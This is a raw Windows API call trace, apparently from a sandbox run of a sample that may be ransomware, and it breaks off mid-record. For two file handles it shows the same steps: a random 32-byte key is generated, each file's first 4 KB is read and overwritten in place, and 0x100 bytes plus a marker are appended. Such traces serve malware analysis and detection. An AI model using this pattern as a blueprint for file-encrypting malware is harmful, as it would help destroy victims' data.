1 [0084.884] ReadFile (in: hFile=0x9a4, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0084.884] SetFilePointerEx (in: hFile=0x9a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.884] GetProcessHeap () returned 0x4f10000 [0084.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.885] GetProcessHeap () returned 0x4f10000 [0084.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.885] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.885] GetProcessHeap () returned 0x4f10000 [0084.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0084.885] ReadFile (in: hFile=0x9a4, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.932] SetFilePointerEx (in: hFile=0x9a4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.932] WriteFile (in: hFile=0x9a4, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.932] GetProcessHeap () returned 0x4f10000 [0084.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.932] GetProcessHeap () returned 0x4f10000 [0084.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.932] GetProcessHeap () returned 0x4f10000 [0084.932] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.932] GetProcessHeap () returned 0x4f10000 [0084.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.932] GetProcessHeap () returned 0x4f10000 [0084.932] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.932] GetProcessHeap () returned 0x4f10000 [0084.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.932] GetProcessHeap () returned 0x4f10000 [0084.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.932] GetProcessHeap () returned 0x4f10000 [0084.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.932] GetProcessHeap () returned 0x4f10000 [0084.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.932] GetProcessHeap () returned 0x4f10000 [0084.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.933] GetProcessHeap () returned 0x4f10000 [0084.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.934] GetProcessHeap () returned 0x4f10000 [0084.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.935] GetProcessHeap () returned 0x4f10000 [0084.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.935] GetProcessHeap () returned 0x4f10000 [0084.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.935] GetProcessHeap () returned 0x4f10000 [0084.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.935] GetProcessHeap () returned 0x4f10000 [0084.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.935] GetProcessHeap () returned 0x4f10000 [0084.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.935] GetProcessHeap () returned 0x4f10000 [0084.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.935] GetProcessHeap () returned 0x4f10000 [0084.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.935] GetProcessHeap () returned 0x4f10000 [0084.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.935] GetProcessHeap () returned 0x4f10000 [0084.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.935] GetProcessHeap () returned 0x4f10000 [0084.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.935] GetProcessHeap () returned 0x4f10000 [0084.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.935] GetProcessHeap () returned 0x4f10000 [0084.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.935] GetProcessHeap () returned 0x4f10000 [0084.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.935] GetProcessHeap () returned 0x4f10000 [0084.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.935] GetProcessHeap () returned 0x4f10000 [0084.936] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.936] GetProcessHeap () returned 0x4f10000 [0084.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.936] GetProcessHeap () returned 0x4f10000 [0084.936] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.936] GetProcessHeap () returned 0x4f10000 [0084.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.936] GetProcessHeap () returned 0x4f10000 [0084.936] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.936] GetProcessHeap () returned 0x4f10000 [0084.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.936] GetProcessHeap () returned 0x4f10000 [0084.936] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.936] GetProcessHeap () returned 0x4f10000 [0084.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.936] GetProcessHeap () returned 0x4f10000 [0084.936] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.936] GetProcessHeap () returned 0x4f10000 [0084.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.936] GetProcessHeap () returned 0x4f10000 [0084.936] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.936] GetProcessHeap () returned 0x4f10000 [0084.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.936] GetProcessHeap () returned 0x4f10000 [0084.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.936] GetProcessHeap () returned 0x4f10000 [0084.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.936] GetProcessHeap () returned 0x4f10000 [0084.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.936] GetProcessHeap () returned 0x4f10000 [0084.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.936] SetFilePointerEx (in: hFile=0x9a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.937] WriteFile (in: hFile=0x9a4, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0084.939] WriteFile (in: hFile=0x9a4, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0084.939] GetProcessHeap () returned 0x4f10000 [0084.939] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0084.939] GetProcessHeap () returned 0x4f10000 [0084.939] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.939] GetProcessHeap () returned 0x4f10000 [0084.939] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.939] CloseHandle (hObject=0x9a4) returned 1 [0084.941] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 139 [0084.941] SetFilePointerEx (in: hFile=0x9a8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.941] ReadFile (in: hFile=0x9a8, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0084.941] SetFilePointerEx (in: hFile=0x9a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.941] GetProcessHeap () returned 0x4f10000 [0084.941] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.941] GetProcessHeap () returned 0x4f10000 [0084.941] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.941] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.941] GetProcessHeap () returned 0x4f10000 [0084.941] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0084.941] ReadFile (in: hFile=0x9a8, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0085.045] SetFilePointerEx (in: hFile=0x9a8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.045] WriteFile (in: hFile=0x9a8, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.046] GetProcessHeap () returned 0x4f10000 [0085.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.047] GetProcessHeap () returned 0x4f10000 [0085.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.048] GetProcessHeap () returned 0x4f10000 [0085.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.049] GetProcessHeap () returned 0x4f10000 [0085.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.049] GetProcessHeap () returned 0x4f10000 [0085.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.049] GetProcessHeap () returned 0x4f10000 [0085.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.049] GetProcessHeap () returned 0x4f10000 [0085.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.049] GetProcessHeap () returned 0x4f10000 [0085.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.049] GetProcessHeap () returned 0x4f10000 [0085.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) 